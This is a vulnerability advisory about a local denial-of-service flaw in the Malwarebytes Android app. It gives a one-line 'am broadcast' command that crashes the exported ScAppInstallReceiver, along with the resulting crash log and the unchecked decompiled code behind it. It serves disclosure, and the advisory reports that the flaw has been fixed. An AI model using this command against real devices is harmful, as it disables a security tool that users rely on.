SIK-2016-012


Title:

Local DOS Malwarebytes App

Report ID

SIK-2016-012

Summary:

A special-crafted intent send from any arbitrary app can crash the Malwarebytes app.

Details:

A local denial of service attack (crash the Malwarebytes app) can be triggered by sending an empty install package broadcast.

The command can look like:

am broadcast -n org.malwarebytes.antimalware/org.malwarebytes.antimalware.security.scanner.receiver.ScAppInstallReceiver

Log output of Runtime Exception:

E/AndroidRuntime(18990): Process: org.malwarebytes.antimalware, PID: 18990
E/AndroidRuntime(18990): java.lang.RuntimeException: Unable to start
receiver
org.malwarebytes.antimalware.security.scanner.receiver.ScAppInstallReceiver
: java.lang.NullPointerException: Attempt to invoke virtual method 'boolean
java.lang.String.contains(java.lang.CharSequence)' on a null object
reference
E/AndroidRuntime(18990): at
android.app.ActivityThread.handleReceiver(ActivityThread.java:2616)
...
E/AndroidRuntime(18990): Caused by: java.lang.NullPointerException: Attempt
to invoke virtual method 'boolean
java.lang.String.contains(java.lang.CharSequence)' on a null object
reference
E/AndroidRuntime(18990): at
org.malwarebytes.antimalware.security.scanner.receiver.ScAppInstallReceiver
.onReceive(org.malwarebytes.antimalware.security.scanner.receiver.ScAppInst
allReceiver:39)
E/AndroidRuntime(18990): at
android.app.ActivityThread.handleReceiver(ActivityThread.java:2609)
E/AndroidRuntime(18990): ... 10 more

This happens because of missing null value checks in the broadcast receiver in the class ScAppInstallReceiver.class .

...
public void onReceive(Context arg5, Intent intent) {
 super.onReceive(arg5, intent);
 if(PreferenceUtils.a(arg5, 2131100041)) {
 String v0 = intent.getDataString(); //<= Problem, intent can be null
 if(v0.contains("package:"))
...

A malicious application can use this to crash the app. Newer Android versions (since Lollipop) mitigate such null value broadcast (try to restart the app), but in pre Lollipop versions it is possible to crash the app completely.

Workaround

Suggested Mitigation

Please fix it.

Timeline

  • 2016-02-11 Vulnerability Discovered
  • 2016-02-15 Vulnerability Reported
  • 2016-03-01 Vulnerability Fixed